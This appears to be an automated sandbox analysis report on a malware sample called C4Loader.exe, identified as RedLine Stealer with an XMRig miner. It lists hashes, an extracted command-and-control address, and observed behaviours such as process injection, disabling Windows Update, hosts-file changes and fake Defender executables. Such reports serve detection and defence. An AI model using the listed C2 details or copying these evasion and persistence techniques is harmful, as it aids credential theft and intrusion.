Analysis
max time kernel: 143s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 11-11-2022 23:23
Static task: static1
Behavioral task: behavioral1
Sample: C4Loader.exe
Resource: win7-20220812-en
General
Target: C4Loader.exe
Size: 124KB
MD5: 99f682f75994261bd769f11cd33820e7
SHA1: 2d8f77e1aebc274f94c56626fe1a71514c01b439
SHA256: 84374cb55c56fb530ef4f83f655ffeb7463e8c0452d7f13d57535d9e032e761f
SHA512: 00ca067af16d76cd5e344065c3f6c223a5e35bf79b67759bfed26e1994bcbe36ca0ff0cfc10c4175659813a1501d8e5d9d64fbcaf98d92459ca052f15ff0f0db
SSDEEP: 3072:x8Bwf9nPJ6+qVDRhIJTz7y1bJs6Httemsk3QnDPofdc:x8Snh2RIEJsKetudc
Malware Config
Extracted
Family: redline
Botnet: 1
C2: 107.182.129.73:21733
auth_value: 3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes: reg.exe
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource | yara_rule
behavioral2/memory/4460-201-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
Suspicious use of NtCreateProcessExOtherParentProcess 17 IoCs
Processes: WerFault.exe (17 instances)
description | pid | process | target process
PID 1520 created 3276 | 1520 | WerFault.exe | DllHost.exe
PID 3920 created 3364 | 3920 | WerFault.exe | DllHost.exe
PID 4920 created 3328 | 4920 | WerFault.exe | DllHost.exe
PID 4320 created 3456 | 4320 | WerFault.exe | DllHost.exe
PID 2440 created 1816 | 2440 | WerFault.exe | DllHost.exe
PID 4440 created 4520 | 4440 | WerFault.exe | DllHost.exe
PID 4184 created 3956 | 4184 | WerFault.exe | DllHost.exe
PID 3276 created 4168 | 3276 | WerFault.exe | DllHost.exe
PID 3284 created 4748 | 3284 | WerFault.exe | DllHost.exe
PID 952 created 224 | 952 | WerFault.exe | DllHost.exe
PID 3564 created 1272 | 3564 | WerFault.exe | DllHost.exe
PID 2892 created 3556 | 2892 | WerFault.exe | DllHost.exe
PID 1648 created 1332 | 1648 | WerFault.exe | DllHost.exe
PID 1972 created 1312 | 1972 | WerFault.exe | DllHost.exe
PID 3164 created 2868 | 3164 | WerFault.exe | DllHost.exe
PID 756 created 4184 | 756 | WerFault.exe | DllHost.exe
PID 4280 created 4368 | 4280 | WerFault.exe | DllHost.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 30 IoCs
Processes: SmartDefRun.exe, SmartScreenQC.exe, dialer.exe, powershell.EXE, svchost.exe
description | pid | process | target process
PID 2032 created 3060 | 2032 | SmartDefRun.exe | Explorer.EXE
PID 2032 created 3060 | 2032 | SmartDefRun.exe | Explorer.EXE
PID 2032 created 3060 | 2032 | SmartDefRun.exe | Explorer.EXE
PID 2032 created 3060 | 2032 | SmartDefRun.exe | Explorer.EXE
PID 2032 created 3060 | 2032 | SmartDefRun.exe | Explorer.EXE
PID 4836 created 3060 | 4836 | SmartScreenQC.exe | Explorer.EXE
PID 4836 created 3060 | 4836 | SmartScreenQC.exe | Explorer.EXE
PID 4836 created 3060 | 4836 | SmartScreenQC.exe | Explorer.EXE
PID 4836 created 3060 | 4836 | SmartScreenQC.exe | Explorer.EXE
PID 5028 created 3060 | 5028 | dialer.exe | Explorer.EXE
PID 4836 created 3060 | 4836 | SmartScreenQC.exe | Explorer.EXE
PID 4836 created 3060 | 4836 | SmartScreenQC.exe | Explorer.EXE
PID 344 created 576 | 344 | powershell.EXE | winlogon.exe
PID 3288 created 3364 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 3276 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 3328 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 3456 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 1816 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 4520 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 3956 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 4168 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 4748 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 224 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 1272 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 3556 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 1332 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 1312 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 2868 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 4184 | 3288 | svchost.exe | DllHost.exe
PID 3288 created 4368 | 3288 | svchost.exe | DllHost.exe
XMRig Miner payload 2 IoCs
resource | yara_rule
behavioral2/memory/4976-252-0x00007FF700E20000-0x00007FF701614000-memory.dmp | xmrig
behavioral2/memory/4976-256-0x00007FF700E20000-0x00007FF701614000-memory.dmp | xmrig
Blocklisted process makes network request 1 IoCs
Processes: powershell.exe
flow | pid | process
30 | 4704 | powershell.exe
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes: SmartDefRun.exe, SmartScreenQC.exe
description | ioc | process
File created | C:\Windows\System32\drivers\etc\hosts | SmartDefRun.exe
File created | C:\Windows\System32\drivers\etc\hosts | SmartScreenQC.exe
Executes dropped EXE 6 IoCs
Processes: C4Loader.exe, new2.exe, SysApp.exe, SmartDefRun.exe, SmartScreenQC.exe, fodhelper.exe
pid | process
2212 | C4Loader.exe
5004 | new2.exe
3444 | SysApp.exe
2032 | SmartDefRun.exe
4836 | SmartScreenQC.exe
1676 | fodhelper.exe
Stops running service(s) 3 TTPs
-
resource | yara_rule
behavioral2/memory/4976-252-0x00007FF700E20000-0x00007FF701614000-memory.dmp | upx
behavioral2/memory/4976-256-0x00007FF700E20000-0x00007FF701614000-memory.dmp | upx
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 9 IoCs
Processes: svchost.exe, powershell.exe, powershell.EXE
description | ioc | process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | svchost.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
Suspicious use of SetThreadContext 6 IoCs
Processes: C4Loader.exe, SmartDefRun.exe, new2.exe, SmartScreenQC.exe, powershell.EXE
description | pid | process | target process
PID 1064 set thread context of 3900 | 1064 | C4Loader.exe | vbc.exe
PID 2032 set thread context of 2436 | 2032 | SmartDefRun.exe | dialer.exe
PID 5004 set thread context of 4460 | 5004 | new2.exe | vbc.exe
PID 4836 set thread context of 5028 | 4836 | SmartScreenQC.exe | dialer.exe
PID 4836 set thread context of 4976 | 4836 | SmartScreenQC.exe | dialer.exe
PID 344 set thread context of 4400 | 344 | powershell.EXE | dllhost.exe
Drops file in Program Files directory 4 IoCs
Processes: SmartDefRun.exe, cmd.exe, SmartScreenQC.exe
description | ioc | process
File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | SmartDefRun.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Google\Libs\WR64.sys | SmartScreenQC.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (10 instances)
pid | process
3208 | sc.exe
1988 | sc.exe
4388 | sc.exe
4608 | sc.exe
4024 | sc.exe
5096 | sc.exe
5036 | sc.exe
3212 | sc.exe
1492 | sc.exe
3728 | sc.exe
Program crash 21 IoCs
Processes: WerFault.exe (21 instances)
pid | pid_target | process | target process
4472 | 1064 | WerFault.exe | C4Loader.exe
3924 | 5004 | WerFault.exe | new2.exe
4992 | 3276 | WerFault.exe | DllHost.exe
5048 | 3364 | WerFault.exe | DllHost.exe
1652 | 3328 | WerFault.exe | DllHost.exe
4712 | 3456 | WerFault.exe | DllHost.exe
1764 | 1816 | WerFault.exe | DllHost.exe
1836 | 4520 | WerFault.exe | DllHost.exe
2136 | 3956 | WerFault.exe | DllHost.exe
5048 | 4168 | WerFault.exe | DllHost.exe
4128 | 4748 | WerFault.exe | DllHost.exe
4248 | 224 | WerFault.exe | DllHost.exe
3116 | 1272 | WerFault.exe | DllHost.exe
4548 | 3556 | WerFault.exe | DllHost.exe
3500 | 1332 | WerFault.exe | DllHost.exe
2928 | 1312 | WerFault.exe | DllHost.exe
856 | 2868 | WerFault.exe | DllHost.exe
3684 | 4184 | WerFault.exe | DllHost.exe
4388 | 4368 | WerFault.exe | DllHost.exe
3284 | 3408 | WerFault.exe |
1124 | 5036 | WerFault.exe |
Checks processor information in registry 2 TTPs 48 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: WerFault.exe (16 instances)
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 32 IoCs
Processes: WerFault.exe (16 instances)
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe, powershell.EXE, dialer.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | dialer.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | dialer.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe, SmartDefRun.exe, SysApp.exe, SmartScreenQC.exe, C4Loader.exe, powershell.EXE, vbc.exe, dialer.exe
pid | process
4704 | powershell.exe
4704 | powershell.exe
2032 | SmartDefRun.exe
2032 | SmartDefRun.exe
2272 | powershell.exe
2272 | powershell.exe
2032 | SmartDefRun.exe
2032 | SmartDefRun.exe
2032 | SmartDefRun.exe
2032 | SmartDefRun.exe
2040 | powershell.exe
2040 | powershell.exe
2032 | SmartDefRun.exe
2032 | SmartDefRun.exe
2032 | SmartDefRun.exe
2032 | SmartDefRun.exe
3744 | powershell.exe
3744 | powershell.exe
3444 | SysApp.exe
3444 | SysApp.exe
3444 | SysApp.exe
3444 | SysApp.exe
3444 | SysApp.exe
3444 | SysApp.exe
3444 | SysApp.exe
3444 | SysApp.exe
3444 | SysApp.exe
3444 | SysApp.exe
4836 | SmartScreenQC.exe
4836 | SmartScreenQC.exe
2212 | C4Loader.exe
904 | powershell.exe
904 | powershell.exe
344 | powershell.EXE
2080 | powershell.EXE
344 | powershell.EXE
2080 | powershell.EXE
4836 | SmartScreenQC.exe
4836 | SmartScreenQC.exe
4836 | SmartScreenQC.exe
4836 | SmartScreenQC.exe
760 | powershell.exe
760 | powershell.exe
4460 | vbc.exe
4836 | SmartScreenQC.exe
4836 | SmartScreenQC.exe
5028 | dialer.exe
5028 | dialer.exe
4836 | SmartScreenQC.exe
4836 | SmartScreenQC.exe
4836 | SmartScreenQC.exe
4836 | SmartScreenQC.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
4976 | dialer.exe
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
648 | (process name not recorded)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe (3 instances)
description | pid | process
Token: SeDebugPrivilege | 4704 | powershell.exe
Token: SeDebugPrivilege | 2272 | powershell.exe
Token: SeDebugPrivilege | 2040 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2040 | powershell.exe
Token: SeSecurityPrivilege | 2040 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2040 | powershell.exe
Token: SeLoadDriverPrivilege | 2040 | powershell.exe
Token: SeSystemProfilePrivilege | 2040 | powershell.exe
Token: SeSystemtimePrivilege | 2040 | powershell.exe
